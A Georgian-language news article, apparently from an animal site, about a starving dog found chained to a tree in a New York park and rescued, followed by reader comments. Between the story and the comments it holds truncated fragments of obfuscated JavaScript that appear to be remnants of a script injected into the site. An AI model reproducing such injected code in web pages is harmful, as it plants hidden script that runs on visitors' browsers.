ძაღლი ყინვაში მოკლე თოკით იყო დაბმული, რომ ვერ დაწოლილიყო. მიწაზე მიყინული ფეხებიდან კი სისხლი სდიოდა.
ძაღლი ყინვაში მოკლე თოკით იყო დაბმული, რომ ვერ დაწოლილიყო. მიწაზე მიყინული ფეხებიდან კი სისხლი სდიოდა.
დილას ჯენიფერ უილიამსი ძაღლებთან ერთად ნიუ-იორკში, პროსპექტ პარკში სეირნობდა. უეცრად მისი ერთ-ერთი ძაღლი გასხლტა და ხის ძირში მოკუნტულ ფიგურასთან მიირბინა. იქ იყო ძაღლი, რომელიც ვიღაცას ხეზე ჯაჭვით მიება.

“მისი ფერი ხეს ეხამებოდა, ამიტომ ძნელად შესამჩნევი იყო. იგი არც წკმუტუნებდა, არც ყეფდა. პატარა იმდენად გაყინული, შეშინებული და დაღლილი იყო, რომ უბრალოდ ვერ ინძრეოდა”.

ჯენიფერი პიტბულისა და ლაბრადორის გამხდარ შავ მეტისს მიუახლოვდა და ახსნა ჯაჭვი, რომელიც, როგოც ჩანს, იმიტომ იყო მოკლე, რომ ძაღლი არ დაწოლილიყო.

Zooclub
ძაღლი ყინვაში მოკლე თოკით იყო დაბმული, რომ ვერ დაწოლილიყო. მიწაზე მიყინული ფეხებიდან კი სისხლი სდიოდა." width="438" height="438" />

ქუჩაში ციოდა, მაგრამ ჯენიფერმა პალტო გაიხადა და მასში ძაღლი გაახვია. როდესაც სახლში მიიყვანა, შეამჩნია, რომ თათებიდან სისხლი სდიოდა. ახლა კი მიხვდა, რატომ ვერ
ინძრეოდა ძაღლი - მისი თათები მიწაზე იყო მიყინული.

Zooclub

Zooclub

სოციალური მედიის ეფექტურობის გამო, ჯენიფერმა ძაღლის ფოტო ფეისბუქზე გამოაქვეყნა. დონნა საქსმა ფოტოს ნახვისთანავე შონ კეისის (Sean Casey Animal Rescue-დან) დაურეკა. ცოტა ხანში შონი უკვე ჯენიფერისკენ მიიჩქაროდა, რომ ძაღლი წაეყვანა.

Zooclub

მიუხედავად იმისა, რომ ძაღლი აშკარად შიმშილობდა, იგი ყინვაში მიატოვეს და თათებიდან სისხლი სდიოდა, ეს უსაყვარლესი გოგონა მაშინვე გამოცოცხლდა, როგორც კი გათბა. ის წამოდგა, როდესაც ჯენიფერმა წყალი დაალევინა.

ძაღლის წამოყვანის დროს შონთან ერთად მანქანაში იყო მისი შვილი, რომელმაც ძაღლს ბინდი დაარქვა.

Zooclub

ბრუკლინში მდებარე ცხოველთა ვეტკლინიკაში VERG ბინდს ახლაც მკურნალობენ. როგორც ჩანს, მას თვალის პრობლემაც ჰქონდა. ასევე, სხეულში რკინა აღმოაჩნდა. ექიმებმა  სხეულიდან რკინის ამოღების მიზნით, ენდოსკოპია გაუკეთეს.

Zooclub

“ვიცი, რომ ვეტერინარის მომსახურების საფასური ძვირი იქნება. მას დასჭირდება მოვლა. უბრალოდ იმედს ვიტოვებთ, რომ მას მოსიყვარულე პატრონს ვუპოვით - ის შესანიშნავი და უსაყვარლესი გოგონაა”,- ამბობს ჯენიფერი.

იმედს ვიტოვებთ, რომ ბინდი მალე გამოჯანმრთელდება და თბილ სახლსა და მოსიყვარულე პატრონს იპოვის!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o
vata
საწყალი როგორ შეიძლები ასე მოექცე ცხოველს
nana
ავტირდი,რატომ იბადებიან ასეთი ბოროტი ადამიანები.გული დამეწვა,საწყალი ძაღლი.
ana-katerina vivian
ამას ადამიანი გააკეტებს?...ეჯვი მეპარება...ის სატანისეულია და ესჰმაკებმა მიხედონ! ეს საცოდავი ცუგა გამოჯანმრელებულიკოს და მოსიკვარულე ოჯახტან ეცხოვროს..
lrc7
გული დამეწვა(( ღმერთმა უშველოს ყველა კეთილ ადამიანს
ლალი
ღმერთმა დაწყევლოს ის არაადამიანი, ვინც ძაღლი ასეთ ყინვასა და სიცივეში ხეზე მიაბა და მიატოვა და ღმერთმა გაახაროს და გააძლიეროს ის ადამიანები, ვინც ამ საბრალო, დაუცველ და საყვარელ არსებას დაეხმარა. იმედია მალე გამოჯანმრთელდება და მოსიყვარულე პატრონსაც იპოვნის
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?